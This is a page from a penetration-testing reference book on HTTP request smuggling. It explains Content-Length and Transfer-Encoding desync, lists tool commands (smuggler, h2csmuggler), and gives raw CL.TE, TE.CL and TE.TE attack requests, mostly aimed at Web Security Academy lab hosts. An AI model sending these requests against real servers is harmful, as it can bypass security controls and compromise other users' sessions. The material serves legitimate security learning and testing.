Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
Root domains
Subdomain Enum
Webs recon
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
General Info
Quick tricks
Header injections
Bruteforcing
Online hashes cracked
Crawl/Fuzz
LFI/RFI
File upload
SQLi
SSRF
Open redirects
XSS
CSP
XXE
Cookie Padding
Webshells
CORS
CSRF
Web Cache Poisoning
Broken Links
Clickjacking
HTTP Request Smuggling
Web Sockets
CRLF
IDOR
Web Cache Deception
Session fixation
Email attacks
Pastejacking
HTTP Parameter pollution
SSTI
Prototype Pollution
Command Injection
Deserialization
DNS rebinding
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
HTTP Request Smuggling

General

HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users. Request smuggling attacks involve placing both the Content-Length header and the Transfer-Encoding header into a single HTTP request and manipulating these so that the front-end and back-end servers process the request differently. The exact way in which this is done depends on the behavior of the two servers: Most HTTP request smuggling vulnerabilities arise because the HTTP specification provides two different ways to specify where a request ends: the Content-Length header and the Transfer-Encoding header.

Tools

1
# https://github.com/defparam/smuggler
2
python3 smuggler.py -u <URL>
3
# https://github.com/defparam/tiscripts
4
​
5
# https://github.com/anshumanpattnaik/http-request-smuggling/
6
python3 smuggle.py -u <URL>
7
​
8
# https://github.com/assetnote/h2csmuggler
9
go run ./cmd/h2csmuggler check https://google.com/ http://localhost
10
​
11
​
12
# HTTP/2
13
# https://github.com/BishopFox/h2csmuggler
Copied!

Samples

1
- The Content-Length header is straightforward: it specifies the length of the message body in bytes. For example:
2
​
3
POST /search HTTP/1.1
4
Host: normal-website.com
5
Content-Type: application/x-www-form-urlencoded
6
Content-Length: 11
7
​
8
q=smuggling
9
​
10
- The Transfer-Encoding header can be used to specify that the message body uses chunked encoding. This means that the message body contains one or more chunks of data. Each chunk consists of the chunk size in bytes (expressed in hexadecimal), followed by a newline, followed by the chunk contents. The message is terminated with a chunk of size zero. For example:
11
​
12
POST /search HTTP/1.1
13
Host: normal-website.com
14
Content-Type: application/x-www-form-urlencoded
15
Transfer-Encoding: chunked
16
​
17
b
18
q=smuggling
19
0
20
​
21
​
22
​
23
• CL.TE: the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.
24
â—‡ Find - time delay:
25
POST / HTTP/1.1
26
Host: vulnerable-website.com
27
Transfer-Encoding: chunked
28
Content-Length: 4
29
​
30
1
31
A
32
X
33
• TE.CL: the front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.
34
â—‡ Find time delay:
35
POST / HTTP/1.1
36
Host: vulnerable-website.com
37
Transfer-Encoding: chunked
38
Content-Length: 6
39
​
40
0
41
​
42
X
43
• TE.TE: the front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.
44
​
45
- CL.TE
46
Using Burp Repeater, issue the following request twice:
47
POST / HTTP/1.1
48
Host: your-lab-id.web-security-academy.net
49
Connection: keep-alive
50
Content-Type: application/x-www-form-urlencoded
51
Content-Length: 6
52
Transfer-Encoding: chunked
53
​
54
0
55
​
56
G
57
The second response should say: Unrecognized method GPOST.
58
​
59
- TE.CL
60
In Burp Suite, go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.
61
Using Burp Repeater, issue the following request twice:
62
POST / HTTP/1.1
63
Host: your-lab-id.web-security-academy.net
64
Content-Type: application/x-www-form-urlencoded
65
Content-length: 4
66
Transfer-Encoding: chunked
67
​
68
5c
69
GPOST / HTTP/1.1
70
Content-Type: application/x-www-form-urlencoded
71
Content-Length: 15
72
​
73
x=1
74
0
75
​
76
- TE.TE: obfuscating TE Header
77
In Burp Suite, go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.
78
Using Burp Repeater, issue the following request twice:
79
POST / HTTP/1.1
80
Host: your-lab-id.web-security-academy.net
81
Content-Type: application/x-www-form-urlencoded
82
Content-length: 4
83
Transfer-Encoding: chunked
84
Transfer-encoding: cow
85
​
86
5c
87
GPOST / HTTP/1.1
88
Content-Type: application/x-www-form-urlencoded
89
Content-Length: 15
90
​
91
x=1
92
0
Copied!
​
Previous
Clickjacking
Next
Web Sockets
Last modified 1yr ago
Export as PDF
Copy link
Edit on GitHub
Contents
General
Tools
Samples